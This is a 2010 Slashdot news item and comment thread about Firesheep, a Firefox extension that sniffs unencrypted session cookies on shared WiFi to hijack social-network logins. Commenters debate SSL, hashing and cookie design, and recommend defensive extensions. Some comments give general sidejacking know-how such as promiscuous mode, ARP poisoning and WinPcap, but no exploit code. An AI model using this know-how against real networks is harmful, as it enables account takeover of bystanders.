Forgot your password?
typodupeerror
Security Encryption Firefox Privacy Social Networks Software Wireless Networking News

Firefox Extension Makes Social-Network ID Spoofing Trivial 185

Posted by timothy
from the plausible-deniability-for-farmville dept.
Orome1 writes "A simple-to-use Firefox plugin presented yesterday at Toorcon in San Diego has hit the security world with the realization that squabbles about Facebook's changing privacy settings and various privacy breaches simply miss the point. 'When it comes to user privacy, SSL is the elephant in the room,' said Eric Butler, the developer of the extension in question, dubbed Firesheep. By installing and running it, anyone can 'sniff out' the unencrypted HTTP sessions currently allowing users on that network segment to access social networks, online services and other website requiring a login, and simply hijack them and impersonate the user."
This discussion has been archived. No new comments can be posted.

Firefox Extension Makes Social-Network ID Spoofing Trivial

Comments Filter:
  • Illegal? (Score:5, Informative)

    by Anonymous Coward on Monday October 25, 2010 @08:09AM (#34010574)

    I don't dispute author's work or goals (I've been using SSH tunneling on public WiFi for years to prevent just this) but he should have mentioned that clicking on information you gathered (and logging in as another user without their concent) is very likely against federal laws in US (and likely most other locations). Just gathering this information can likely be argued to be illegal as well (wiretapping?)

    So be careful where you click..

    • Leaving aside md5 cracks (use another algo if you want):

      md5 the password with Javascript on the client end before sending it. Then un-md5 it with PHP on the server.

      Plenty of security-conscious CMS's have been doing this before Mark Z even thought of an electronic facebook.

      • Re: (Score:2, Insightful)

        by gmurray (927668)
        md5 is a hash algorithm. How would that help? If someone can snoop your md5 hash they can replay it to gain access to the server, and then change your password (provided the server doesn't provide a challenge to perform this action). All md5 does is protect your actual password, which is small protection if your account can be illicitly accessed anyway. None of these services send a password in plaintext (hopefully). That isn't the issue. The issue is that they use replayable tokens and don't use encryption
        • by gmurray (927668) on Monday October 25, 2010 @10:10AM (#34011588)
          furthermore the entire usefulness of md5 is that you can't un-md5 it ;-)
          • by ghjm (8918)

            Or, depending on who you are, the usefulness might be that no-one else can.

        • by Culture20 (968837) on Monday October 25, 2010 @10:32AM (#34011912)

          md5 is a hash algorithm. How would that help? If someone can snoop your md5 hash they can replay it to gain access to the server, and then change your password (provided the server doesn't provide a challenge to perform this action). All md5 does is protect your actual password, which is small protection if your account can be illicitly accessed anyway. None of these services send a password in plaintext (hopefully). That isn't the issue. The issue is that they use replayable tokens and don't use encryption to send them on the wire.

          Well, then md5 the hash. It's just like using triple-DES or double rot-13 (one of the two, or maybe a happy middle-ground). ;)

      • Re: (Score:2, Informative)

        by ogapo (1420605)
        I think you may not understand how a cryptographic hash works. In the scheme you are describing, the password is typically hashed on the client side (along with some value specified by the server which changes every time). When the server gets the hash, it hashes the password (as stored in the DB and possibly also hashed) along with the same value and compares the result. Regardless, what this plugin does is not steal passwords, but simply looks for authenticated credentials (usually cookies). See, once yo
        • by Compaqt (1758360)

          Did I really say un-md5 ?!! Sorry, I meant "compare the hash sent by the client to that saved in the DB".

          Even so, this technique uses cookies, and not the password or hash. (Note to self: Read the articles!)

          Typo3 is one CMS that you can set to check the incoming IP and make sure it's the same as the IP that originally authenticated.

          Drupal 6 is abysmal in that it doesn't even use salt; probably half the passwords in table users are likely to be in an md5 database somewhere.

          • by shmlco (594907)

            "Typo3 is one CMS that you can set to check the incoming IP and make sure it's the same as the IP that originally authenticated."

            If you snatched someone's cookies over free WiFi at a coffeehouse, you probably HAVE the same IP address as they do, since all the server sees is the coffeehouse's gateway IP address.

            IOW, that won't help either.

            • by hairyfeet (841228)

              Plus I'd add that tying ANYTHING, from authentication to bans, to an IP address given that we are running out of IPV4 and most likely will be seeing more and more bigger and bigger NATs is a bad idea to beat ALL bad ideas.

              While I'm not into social junk and therefor don't have a clue how they authenticate (but really not surprised if its easily hacked, considering the amount of spam I've gotten from friends that use FB) tying ANYTHING into IP before we've had the switch to IPV6 is just a universally BAD i

      • Re: (Score:2, Insightful)

        by Anonymous Coward

        This won't work as the extension sniffs out cookies, not passwords.

        Even then, this won't help as the extension could be changed to sniff the hashed password (it's just send as plain text over HTTP), and send that hash itself.

        • "If you snatched someone's cookies over free WiFi at a coffeehouse, you probably HAVE the same IP address as they do, since all the server sees is the coffeehouse's gateway IP address."

          "Even then, this won't help as the extension could be changed to sniff the hashed password (it's just send as plain text over HTTP), and send that hash itself."

          All this talk of sniffing cookies and hash has got my stomach rumbling.

          Enough already.

      • by jwietelmann (1220240) on Monday October 25, 2010 @10:32AM (#34011920)

        Hash = 1-way crypto

        The only way to "un-md5" anything is to crack it. Also, I'm not sure you actually put any real thought into this.

        Since it's best practice to store only password hashes (and not the passwords themselves) in your database (or whatever), your process is apparently:

        1. Client md5's the password, sends it to server
        2. Server "un-md5"s the password (let's say for argument's sake that this makes perfect sense)
        3. Server md5's the un-md5'd password
        4. Server checks hash against user's hash in the database
      • Re: (Score:2, Informative)

        by Mashiara (5631)

        You are missing the point.

        The problem is not reading the password as plaintext from the cookie (now that would be monumentally stupid design) but that since the cookie equals valid session authentication copying the cookie equals session hijacking (or sidejacking since the original cookie is still there on the original users machine).

      • Re: (Score:3, Funny)

        by PatPending (953482)

        md5 the password with Javascript on the client end before sending it. Then un-md5 it with PHP on the server.

        Or use quad-ROT13 instead.

      • Leaving aside md5 cracks, WTF do you mean by "un-md5 it"? You can't do that!

      • by Compaqt (1758360)

        Please somebody mod my original post [slashdot.org] as Funny and not Informative to avoid future PHP-Nukes.

        What you actually need to do at the very least is:

        1. md5 [slashdot.org] (or another algo) with Javascript on the client and compare that hash to the one saved in the DB. If the password is stored in cleartext (which it shouldn't be, but sometimes external systems are out of your control), md5 [php.net] it with PHP.

        2. Some people use SSL on the login page.

        3. But this attack shows crackers just intercepting an replaying the creds. Discouraging

  • First haxx! (Score:4, Funny)

    by Anonymous Coward on Monday October 25, 2010 @08:09AM (#34010576)

    Ha ha, anon is pwned :D

    • by Anonymous Coward on Monday October 25, 2010 @08:12AM (#34010590)

      WTF !, this guy is logged in as me !

      • My comments (Score:3, Funny)

        by formfeed (703859)
        I'd like to declare that all comments under my user name that are controversial or could get me in trouble were made by someone else.

        Someone, who obviously must have sniffed out my wireless cookies. -Shame on them.

  • by buchner.johannes (1139593) on Monday October 25, 2010 @08:10AM (#34010578) Homepage Journal

    here: http://codebutler.com/firesheep [codebutler.com]

    They apparently call it "sidejacking", i.e. sniffing other users cookies from a wifi, and using it. Not new, but made userfriendly.

    • the realization that squabbles about Facebook's changing privacy settings and various privacy breaches simply miss the point.

      I'm much more concerned about that then someone on my network stealing my password. If they're on my network, they could steal my password? This is not new, nor is it news. The number of people on the internet out to get your personal information is much, much higher than the number of people on your network out to do the same.

      This is just a high-tech version of this:

      'When it comes to user privacy, other people are the elephant in the room,' said SudoGhost, random douchebag author of the post in question, dubbed 'Other People in the Room'. By being in the room and watching the screen/keyboard, anyone can 'sniff out' not only the unencrypted HTTP sessions, but virtually any keystroke, allowing your mom to access social networks, online services and other website requiring a login, and simply hijack them and find out where you really were Saturday night."

    • by DrYak (748999) on Monday October 25, 2010 @08:53AM (#34010814) Homepage

      Kudos to FaceBook and most other networks for NOT using encryption for anything but the log in, making such hacks possible !
      I know that HTTPS would put some stress on the servers, specially with something as big as Facebook.
      But, come-on. Social networks have become so important for some people, that the risks of vandalism/identiy spoof/deffamation, etc. are significant and would benefit from some more protection.

      • Re: (Score:3, Interesting)

        by FrostDust (1009075)

        Do they have any guarantee that all of their users have a browser that supports HTTPS?

        To Facebook, it's better to allow access to as many users as possible, than lock some out in the name of security.

        • by Confusador (1783468) on Monday October 25, 2010 @10:21AM (#34011734)

          There's a world of difference between having a fallback for those who can't use the secure site (with a warning that it is not secure, even) and not having an option for those who can.

      • You don't even need HTTPS. HTTP already supports authentication mechanisms. If we'd use digest authentication for logins then we wouldn't have to bother with cookies at all. Unfortunately, there's no way to make a pretty login page for digest (or plain) authentication. The browser pops up a username/password dialog instead. Therefore, web sites avoid it and opt instead for the mess of cookies and all their security issues.

    • by thomst (1640045) on Monday October 25, 2010 @09:11AM (#34011002) Homepage

      here: http://codebutler.com/firesheep [codebutler.com].

      Steve Manuel of TechCrunch claims that the Force-TLS 2.0 [mozilla.org] Firefox extension can defeat Firesheep. (You have to configure it manually for each site you want to protect, though, so it's somewhat of a PITA.)

      Another option is the HTTPS Everywhere [eff.org] Firefox extension from EFF and the Tor Project. Although HTTPS Everywhere has a predefined ruleset that includes some of the most popular Web sites, you'll still have to write your own ruleset [eff.org] for any site not on their default list.

    • by AK Marc (707885)
      I'll call it "freejacking" in honor of the best movie Emilio Estevez or Mick Jagger were ever in. Which was, coincidentally, the worst movie Anthony Hopkins was even in.
  • and this is news ? (Score:3, Insightful)

    by Torvac (691504) on Monday October 25, 2010 @08:12AM (#34010586)
    someone in the same network sniffing your unencrypted traffic is facebooks fault ? or the fact that someone made a UI to do it for dummies ?
    • by Anonymous Coward on Monday October 25, 2010 @08:15AM (#34010604)

      the fact that it's unencrypted is facebooks fault, it's not hard to push everything through HTTPS, there's no excuse these days

      • Re: (Score:3, Informative)

        While I'm inclined to agree that any remotely commercial website should offer and default to encrypted transfers, it also serves you right if you use a service that doesn't encrypt everything. Using a service that doesn't at least offer you the option of encryption is akin to driving a car that you know has defective brakes (ha, car analogy!). If shit goes badly and you knew better, you've no one to blame but yourself. If you didn't know better, it's your own fault for not educating yourself about such b

    • by Ephemeriis (315124) on Monday October 25, 2010 @08:25AM (#34010652)

      someone in the same network sniffing your unencrypted traffic is facebooks fault ?
      or the fact that someone made a UI to do it for dummies ?

      The fact that it is unencrypted is, yes.

      • by Afty0r (263037)

        The fact that it is unencrypted is, yes.

        Wait, it's Facebooks' fault that you chose to browse their site unencrypted?

        You have the choice - if you visit https://facebook.com/ [facebook.com] it will let you run your entire session on the site in https. They obviously support SSL for those who want it... I fail to see how it's their fault?

        • by Aqualung812 (959532) on Monday October 25, 2010 @10:27AM (#34011828)

          You have the choice - if you visit https://facebook.com/ [facebook.com] it will let you run your entire session on the site in https. They obviously support SSL for those who want it... I fail to see how it's their fault?

          Follow the link you attached. Log into Facebook. Click the Facebook icon on that page to return to your home page, or click on a link to a fan page you have, or click on a link to a friend's page. You just went from SSL to HTTP. They make it hard to STAY on SSL, even if you go through the work of going there manually.

          • Re: (Score:2, Informative)

            by KBJorgensen (1819456)
            The Chrome extension KB SSL Enforcer automatically redirects you to SSL every time you visit Facebook (and other sites) and changes all links to point to SSL. Although I do agree that they should just use SSL by default on a site with so much personal info. Disclaimer: I made this extension.
        • Should be encrypted by default. Should not be an unencrypted option.

    • Why is it anyone's "fault?" Who cares? It's Facebook for science's sake! It's all just pictures of people's kids and crap, it doesn't matter at all if someone logs on as me and posts nonsense!

      [/perspective]

      • by Culture20 (968837)

        Why is it anyone's "fault?" Who cares? It's Facebook for science's sake! It's all just pictures of people's kids and crap*, it doesn't matter at all if someone logs on as me and posts nonsense!

        [/perspective]

        * that people have a general sense of being true. Great mischief can be done with data gathered, or accounts used/people impersonated.

    • The news is that still hardly anyone understands SSL or what it is for.

      People like to see that little lock sign (or whatever obscure message their browser displays) when they log into their bank. But I sincerely doubt that the great majority of people have any idea that things like e-mail transactions can be routed over SSL or why that might be a good (i.e., critically important) idea.

      Just scan your local neighborhood and look at (for an analogous example) how many people are still using WEP and thinking th

      • Email (IMAPS/SMTPS to your server) over SSL is nice but ultimately irrelevant, as you don't know if the rest of the path is encrypted. Only OpenPGP is safe.

        WEP is similar; it's not a real protection, but stops the random kid trying to use your 'net to download stuff.

  • Why no encryption? (Score:4, Interesting)

    by AHuxley (892839) on Monday October 25, 2010 @08:19AM (#34010626) Homepage Journal
    What is the cpu use and heat of the user base requesting and using ssl vs this bad news?
    "Double-click on someone, and you're instantly logged in as them."
    Whats the the extra use 15-20%? vs unencrypted HTTP.
    Would ssl been left off allow creative law enforcement uses?
  • Plugin-rebuttal.

  • What permissions do you need for this? Do you have to be the owner of the network in order to sniff things out in this manner? Or is it possible for me to steal accounts off a public network?

    If its the former, then there's nothing too special - sniffers can do that already.

    If its the latter, then its time to put on the tinfoil hats.
    • Re: (Score:2, Informative)

      by pinkeen (1804300)
      It is wifi sniffing. The data is in the air. All you need is to be in the range of client's radio transmissions. If the network is encrypted then you need WEP/WPA(2) key.
    • by mbone (558574) on Monday October 25, 2010 @09:08AM (#34010960)

      What permissions do you need for this? Do you have to be the owner of the network in order to sniff things out in this manner? Or is it possible for me to steal accounts off a public network?

      None, no, and most emphatically yes.

    • by Stray7Xi (698337) on Monday October 25, 2010 @10:28AM (#34011846)

      What permissions do you need for this? Do you have to be the owner of the network in order to sniff things out in this manner? Or is it possible for me to steal accounts off a public network?

      You need to be administrator to place your network card into promiscious mode [wikipedia.org] or rfmon for wireless.

      So in a public wifi network you're screwed. In a public ethernet network it depends if it's a switched or hubbed network. But even in a switched network you could be vulnerable to this via ARP poisoning.

      The takeaway is what we've known for decades, if you want private communications use encryption.

  • squabbles about Facebook's changing privacy settings and various privacy breaches simply miss the point.

    Another point does not "miss the point".

    Transport security != corporate marketing of private data

  • by SpinningCone (1278698) on Monday October 25, 2010 @08:38AM (#34010708)

    I used to do sniffing and stuff like this a couple years ago and the biggest hurdle was finding a wireless adapter which would allow promiscuous mode. aircrack sells one that comes with 1st party drivers to allow sniffing. I used a linksys usb adapter since there were 3rd party drivers that allowed it.

    unless something has changed I thought most wireless driver didn't support promiscuous mode for sniffing.

  • How does it work? (Score:3, Interesting)

    by pinkeen (1804300) on Monday October 25, 2010 @08:39AM (#34010712) Homepage
    The article is extremely light on details. The plugin's page [codebutler.com] doesn't tell much either. I'm curious how does it capture the WIFI packets. Is it possible to capture them when not in monitor mode?
    • Re:How does it work? (Score:4, Informative)

      by will_die (586523) on Monday October 25, 2010 @09:12AM (#34011008) Homepage
      You first need to installWinPcap [winpcap.org] this is the program that does the actual work. You then log on to the wifi, using password if required, and the program starts looking for know cookies. If it finds them it captures the info and gives you a nice userfriendly way of using them.
      It can capture the wifi since anyone can capture them if you are within range of the transmissions. You if you are not monitoring when the signals go out you cannot capture them.
      • Re: (Score:3, Interesting)

        by pinkeen (1804300)
        That wasn't my question. When in monitor (promiscous) mode, adapter can capture but cannot associate and give you internet connection. So, when you capture packets you need another wlan adapter or ethernet nic for your internet conncetion to actually use this stolen cookies. There's no mention of it on the site. So I wondered that maybe the plugin does some magic and captures packets while the same adapter is associated with an ap.
  • by Viol8 (599362) on Monday October 25, 2010 @08:46AM (#34010766)

    ... that the bleating masses who so readily rushed to put their entire lives and details on social networking sites despite all the warnings are now running around shouting at all the chickens that are coming home to roost?

    For the rest of us with some common sense this is just hilarious.

    • by betterunixthanunix (980855) on Monday October 25, 2010 @08:55AM (#34010846)
      To be fair, most of those people do not actually care. There is a small minority of users who do care, but for some reason continue to use those websites; the rest just want to follow the crowd without stopping to question anything.
    • by beh (4759) *

      For the rest of us with some common sense this is just hilarious.

      You're making a bad judgment here - there is a lack of common sense in both IT geeks like 'us' und normal users (anyone outside IT).

      The issue with facebook and security has nothing to do with common sense per se, but with IT training. You and I may know a few things about security, which may lead us to accept some things, but reject others.
      People outside IT do not have this type of training, nor would it be easy to bestow it on them. It IS the kind of people (the 90+% of the planet) which can not easily fo

    • I hate to break it to you but the intersection of the set of people whom you consider to be the "bleating masses who so readily rushed to put their entire lives and details on social networking sites" and the set of people who read about the opensource project known as firesheep AND are really concerned about someone packet sniffing on their own network and then doing something malicious with it (just logging in is likely completely illegal) is probably incredibly small so no one is running around shouting

      • by Viol8 (599362)

        Well for a start mixing metaphors doesn't mean just using 2 in the same sentence and secondly if you think living your life on a social networking site is "frollicking in the sun" then I'd suggest you get out more my friend.

      • by mcgrew (92797) *

        those dang sheep finally got their comeuppance for frolicking in the sun instead of hunkering down underground and now are all whaling

        Whaling is against international treaty these days, haven't you heard? And what does hunting whales have to do with facebook, anyway?

        • The Council of Wool, being the governing body of Sheep, never signed onto that treaty due to the long history of conflict in sheep-whale relations.

          God catch ;)

    • by mbone (558574)

      Look, I know plenty of people who use Facebook and the like basically as a means to post blogs (or, as "twitter with 420 character posts"). They don't put up anything personally sensitive, but they would still be pissed off if someone stole their info and started putting up posts in support of neo-Nazi child pornography or whatever.

    • by Klinky (636952)

      This is session cookie hijacking, it could be used to spoof your Slashdot credentials just as much as someone's Facebook account. Someone just put "Social Network" in the headline to make it seem more hip. Cookie spoofing has been known since the invention of Cookies.

  • Cookie theft (Score:5, Insightful)

    by Securityemo (1407943) on Monday October 25, 2010 @08:54AM (#34010828) Journal
    It's "just" WiFi cookie theft. You can do that easily with wireshark and copy/paste, this just makes it a bit faster. The problem lies in session cookies, and this is a problem known for what, almost a decade now?
  • It is the lack of SSL that is the problem here, and it is the non-use of SSL that 'is the elephant in the room,'

    This has been going on for a long time now - attend a NANOG meeting and use unencrypted logins, and you may well see your password on the screen by the end of the meeting - the white hat guys routinely sniff the wireless for passwords.

  • But will it... (Score:2, Interesting)

    by koterica (981373)
    run (on) linux? Apparently not. I guess I wont be using it.
  • It seems that this is most concerning for those loggining in while using public networks (such as accessing with a cafe's WiFi).

    So this leads me to ask if I am safer when using the Facebook/Amazon/eBay app rather than the mobile browser. Is the security of the iPhone or android apps better than the web security for Facebook?
    Or can I make my access of these sites more secure myself somehow?
    • by DJ Rubbie (621940)

      One way to find out is to do a promiscuous tcpdump of your local network traffic while using that app - if you can read personally identifiable items in plain text, you are simply not safe.

  • I really miss the old good days, where talks on security conferences would blow you away, and where people would actually talk about new security related things, rather than showing 76th way of automating a process/procedure that has been known for 10 years (always involving grabbing [flavor of the month service]'s password).

    Oh well, guess people were in security world for different reasons 10 years ago...

    • by Hartree (191324)

      I must be really really old...

      Yeah, you are. And me too. I bet a lot of the young'uns here have never heard of the protocol in your username.

  • This needs to be heard by everyone. NOW. Sure, your New York Times access is largely trivial, but Facebook and gmail access? That's someone's life. Amazon, and soon Netflix, PayPal, and eBay? That's someone's money. Maybe once people start losing money and their jobs websites will realize the severity of security, as that's usually when it hits home. But until then, very neat.

    Protect yourself: https://addons.mozilla.org/en-US/firefox/addon/12714/ [mozilla.org]

  • KB SSL Enforcer (Score:3, Interesting)

    by brunes69 (86786) <`slashdot' `at' `keirstead.org'> on Monday October 25, 2010 @10:57AM (#34012332) Homepage

    This is why I use this Chrome extension - https://chrome.google.com/extensions/detail/flcpelgcagfhfoegekianiofphddckof [google.com]

    Basically for any site you go to it AUTOMATICALLY redirects you to the SSL version of that site if it exists. Including ssl.facebook.com.

    Yes ssl.facebook.com should be the default, as should most sites, but until they are this extension is invaluable IMO.

  • When I am using public WiFi, I tend to SSH-tunnel to my proxy at home for web browsing,
    It usually makes for a better browsing experience too because DNS on public WiFi usually sucks and the compression over SSH means that most web pages loads quicker.

  • Although I'm not holding my breath for IPv6 to be widely adopted any time soon....the fact that encryption is mandated in the protocol as an option is something that is long overdue. Clear text non-encrypted network traffic is something everybody should avoid if possible. (which is REALLY hard without a lot of work).

    Maybe if encryption was mandated in packets sniffing this sort of stuff would not be a issue? (yes)

  • Speaking as seebs, who I actually am, I think this addon is a brilliant example of the importance of making a threat concrete and specific in order for people to understand it. I, for one, welcome our new us overlords.

    Consider:

    http://www.csd.uwo.ca/staff/magi/personal/humour/Computer_Folklore/Robin%20Hood%20And%20Friar%20Tuck.html [csd.uwo.ca]

    This is not a new technique. This is not a bad thing, particularly. And compared to the severity of the problem, I think it's pretty tastefully understated.

    And again, this is ac

We have a equal opportunity Calculus class -- it's fully integrated.

Working...